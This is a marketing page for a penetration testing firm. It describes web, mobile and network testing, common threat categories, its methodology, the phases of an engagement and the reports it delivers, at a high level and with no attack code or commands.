Penetration Testing

Our security experts act out the role of a hacker, trying to compromise IT systems and employees to discover any potential weaknesses that could be exploited by real hackers. We collect the results of our simulated hacker attacks, summarize them and present our findings in a high-level report that contains an executive summary. Vulnerabilities that were found ranged according to CVSS v3, including our specific recommendations for fixing them.

According to the Cisco 2018 Annual Cybersecurity Report, 31% of security professionals reported that their organization had already experienced cyber attacks on their IT infrastructure. Further, ransomware attacks are growing by more than 350 percent annually.

Penetration testing is considered to be one of the most common vulnerability assessment activities for companies. It is a proven method of evaluating the security of computing networks, infrastructure and application weaknesses by simulating a malicious attack.

Taking good care of your IT environment means ensuring your assets are not vulnerable to cybercriminals and cyberthreats.

PENETRATION TESTING TYPES

Web Application penetration testing

Web applications like portals, microsites, or other online tools allow users to perform actions rather than web pages that can only display content. Almost every web application processes sensitive data like user and financial information, making a web application an attractive target to cybercriminals. With the increasing complexity of web applications, the chances of finding a multitude of exploitable weaknesses are becoming higher.

It is almost impossible to detect application vulnerabilities with an automated penetration test or security assessment since no software can perform comprehensive security testing of a customized web application.

A Verizon 2017 Data Breach Investigation Report found that “almost 60% of breaches involved web applications either as the asset affected, and/or a vector to the affected support.

We looked into the most common threats that web applications commonly face and that businesses have to tackle to protect their customers’ sensitive data.

Improper Test

App developers often ignore data input and output testing when creating applications. As many business owners believing their applications do not process critical data and hence will not be targeted by malicious actors.

API Hacks

Application programming interfaces (APIs) may also be compromised to hack into a web application and get access to its code. HackControl offers API penetration testing to check it for all the known vulnerabilities and provide you with a comprehensive report with recommendations on fixing found bugs.

SQL Injection

In many web applications, there is no blocking of SQL commands on login forms, thus attracting hackers who could use automatic tools to send thousands of SQL requests to exploit access points and take control over a whole database.

DoS and DDoS Attacks

One of the most feared types of attacks by system administrators. We can optionally include DoS and DDoS resistance testing into the scope of the pentest of your web application.

XSS Attacks Application

Hackers may inject a script, take over an administrator session, and, hence, control over the whole website and its content.

Mobile Application (iOS, Android) testing

Mobile applications have become a significant part of everyday life. The number of mobile devices has been increasing heavily. With the increasing adoption of mobile application usage, it becomes crucial for businesses to protect their users by providing proper security for their sensitive personal data stored on iOS and Android devices. This becomes quite a challenge since mobile devices have become an attraction for hackers due to the number of exploitable vulnerabilities.

According to Arxan cybersecurity research, 90% of tested mobile devices and specific applications had at least 2 common mobile vulnerabilities out of 10 from OWASP Mobile Top 10 Risks. So what are the most widespread threats for mobile devices and their operating systems?

Vulnerable server-side mechanism

Servers are where mobile end users’ data is stored and where the communication between a mobile application and a user happens. Basic security server-side policies are not taken into account, which results in the hacking of servers.

No Multifactor Authentication

Most users have the same password for multiple accounts on different applications. Those passwords do not follow basic security recommendations and are gifts for hackers who want to compromise those applications and systems.

Weak Encryption

Many messengers on mobile platforms and more than 13% of mobile devices have not proper encryption so that adversaries who managed to hack into those systems see personal data and other valuable content practically in plain text.

Malicious Code Injection

An intruder may inject malicious code into a login form to intercept the credentials and get access to a user’s personal information. We define a security assessment criteria for and perform grey-box testing, which means you let us know the necessary information about your application, like access roles, credentials, functions, etc.

Privileges Escalation

Inappropriate session management gives hackers a good opportunity to escalate privileges. There are many other factors that constitute security threats to mobile devices and their users, but we’ve enumerated the most important ones.

Sensitive Data Storage

It is common practice to store data on the client-side. The best practice is to create another encryption layer to the one provided by the operating system.

NETWORK AND SYSTEM TESTING

Our approach is to identify the most serious risks and security flaws first and then focus on the less obvious areas as the project proceeds. Firstly, we test the network for vulnerabilities from the outside, conducting the test from the point of view of an uninformed attacker. We then gradually increase the amount of information given to our testers until they assume the role of a trusted user of the network trying to access an unauthorized resource or service. The following list provides additional details regarding the specifics of each access level.

The consistent deployment of this approach is ensured by the use of leading security solutions. Further, the expertise of our staff, combined with the use of comprehensive work-programs that enhance quality control procedures, allows us to consistently deliver the best customer experience.

We combine both manual and automated techniques to unveil vulnerabilities that could exist in your networks. To ensure your security, we create real-world attack scenarios in a controlled and professional fashion. HackControl helps to ensure your sensitive data is properly protected, and compliance requirements are being met by imitating the attacks of real hackers.

External pentest with access level as “naive” hacker

The purpose of a hacker is to establish if it is possible to gain unauthorized access, having either limited or no knowledge about the targeted network.

External pentest with access level as supplier/customer

The goal is to establish if a hacker can gain unauthorized logical access through an external network. A hacker has the same access level as a customer or supplier.

Internal pentest with access level as an unauthorized user

Define whether unauthorized use can be gained via internal penetration testing using loopholes in resources and network services.
Identify if a user can manipulate key controls that protect the company’s system(s). Estimate if the company has procedures in place to respond to such activities and protect the system effectively. Security assessment of sensitive servers and workstations, if there are any.

Firewall and security systems review

Analyze the effectiveness of policies employed by your firewalls and administrative infrastructure Review the following: Configuration of the operating system to ensure secure implementation.
Procedures and processes are responsible for the monitoring and reporting of incidents on the firewall.

Network and host security components (e.g. IDS).

Our Methodology

Our methodology is based on the is based on generally accepted industry-wide approaches to perform penetration testing:

  • OWASP Testing guide
  • BSI A Penetration Testing Model
  • PTES Penetration Testing Execution Standard
  • OSSTMM Open Source Security Testing Methodology

Manual complemented by the custom security testing process and experience. We identify vulnerabilities that can be used to steal funds or damage the reputation of the project.

Phases of Penetration Testing

1. Opening Phase

We commence with a kick-off meeting with your responsible technical staff to define exactly what IT systems or employees should be tested. This highly depends on your current pain points, which we are going to find out using an individual and client-oriented approach. The necessary user accounts and access credentials will be provided and responsible contact persons and escalation channels will be defined.

2. Planning and Reconnaissance

We collect information based on the agreement we made in the Opening Phase. Depending on the IT systems that are going to be tested, we will perform automated vulnerability scanning or port scanning to get our security experts prepared for the next active phase. This may also include gathering information about your employees to prepare for a phishing campaign.

3. Information Validation

Our security experts validate the information gathered during the course of Planning & Reconnaissance to prove its consistency. This will help them identify potential vulnerabilities.

 

4. Manual Testing

Based on industry-trending methodologies, our security experts try to exploit identified weaknesses, escalating access privileges, and attempting to gain access to stored data.

5. Report Preparation

You will receive a report with an executive summary and all found vulnerabilities franked according to CVSS v3, along with our recommendation on how to fix them.

6. Remediation

Based on the report, your professionals fix identified vulnerabilities.

7. Re-test

At this stage, there is an option for us to check the remediated points and provide you with a final report on how to fix the vulnerabilities we initially found.

What We Offer

We offer 3 main types of web application pentest:

Black-box testing

Our security experts act the role of uninformed hackers, trying to break into the application without any information from you.

Grey-box testing

You provide us with information on the application’s functionality, credentials, and access roles.

White-Box Testing

You provide us with access to your application’s source code.

Key deliverables

Consultant Technical Report with a detailed findings section. The findings section contains:

  • screenshots and detailed description regarding the reproduction of security issues;
  • the risk level for each vulnerability;
  • remediation recommendations.

Contact us